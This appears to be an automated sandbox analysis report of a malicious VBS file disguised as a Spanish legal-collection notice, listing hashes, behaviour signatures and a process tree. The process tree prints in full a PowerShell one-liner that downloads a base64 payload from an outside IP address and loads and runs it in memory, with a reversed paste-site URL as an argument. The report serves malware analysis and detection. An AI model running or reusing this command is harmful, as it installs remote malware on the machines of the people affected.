Analysis

  • max time kernel
    43s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    09/10/2022, 06:14

General

  • Target

    56325762828282 COBRO JURIDICO.vbs

  • Size

    437KB

  • MD5

    3ae400fde403322cee0a88408828cba8

  • SHA1

    7aac489534006c5de8080d639f29f9fdcc5a0079

  • SHA256

    3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532

  • SHA512

    2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084

  • SSDEEP

    48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1028

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1028-57-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp

          Filesize

          10.1MB

        • memory/1028-58-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

          Filesize

          11.4MB

        • memory/1028-59-0x0000000002524000-0x0000000002527000-memory.dmp

          Filesize

          12KB

        • memory/1028-60-0x000000000252B000-0x000000000254A000-memory.dmp

          Filesize

          124KB

        • memory/1028-61-0x0000000002524000-0x0000000002527000-memory.dmp

          Filesize

          12KB

        • memory/1028-62-0x000000000252B000-0x000000000254A000-memory.dmp

          Filesize

          124KB

        • memory/1672-54-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

          Filesize

          8KB